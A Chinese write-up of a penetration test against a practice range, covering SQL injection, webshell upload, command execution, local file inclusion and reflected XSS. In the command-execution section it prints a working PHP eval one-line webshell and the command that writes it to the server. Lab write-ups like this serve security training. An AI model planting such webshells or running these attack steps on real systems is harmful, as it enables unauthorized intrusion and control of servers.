seafaring靶场渗透测试

1.sql注入漏洞

进来这里有个框

尝试xss没有那咱们就来试试搜索行注入

这里有东西说明闭合成功,接着就order by 有三列

三个地方都有回显

查看数据库

这里查表发现只有两个

先去看看admin先来看看列

然后看用户密码,这里密码直接显示出来了

2.文件上传漏洞

拿去登录看看里边有个上传文件的地方上传一个一句话木马上去

可以上传php

拿它给的地址去访问,成功访问到

拿去蚁剑连接成功

3.命令执行漏洞

下边有个框里边有个ls这里我直接点了个执行

结果就可以看到文件

输入whoami能显示

直接写入一句话木马 echo '<?php phpinfo();@eval($_POST[cmd]);?>' > sxy.php

然后访问

再拿去连接

4.文件包含漏洞

点关于弹出来about.php?file=header.php说明存在文件包含我们上边可以通过写入的phpinfo看到远程文件包含关闭

那只能用本地文件包含了,这里通过读取上边写入的木马文件来访问

这里上边连过了就不连了

5.xss反射型

来到登录页面两个框

先试上边的成功回显弹窗

相关推荐
jjyangyou2 小时前
物联网核心安全系列——物联网安全需求
物联网·算法·安全·嵌入式·产品经理·硬件·产品设计
AltmanChan3 小时前
大语言模型安全威胁
人工智能·安全·语言模型
马船长3 小时前
红帆OA iorepsavexml.aspx文件上传漏洞
安全
hikktn11 小时前
如何在 Rust 中实现内存安全:与 C/C++ 的对比分析
c语言·安全·rust
23zhgjx-NanKon12 小时前
华为eNSP:QinQ
网络·安全·华为
23zhgjx-NanKon13 小时前
华为eNSP:mux-vlan
网络·安全·华为
昔我往昔13 小时前
阿里云文本内容安全处理
安全·阿里云·云计算
棱角~~15 小时前
盘点和嗨格式一样好用的10款数据恢复!!
数据库·经验分享·安全·电脑·学习方法
NETFARMER运营坛16 小时前
如何优化 B2B 转化率?这些步骤你不可不知
大数据·安全·阿里云·ai·ai写作
安徽京准16 小时前
京准时钟:无人机卫星信号安全防护隔离装置
安全·无人机·信号安全防护装置·卫星安全隔离装置·北斗授时安全隔离·北斗对时防护隔离装置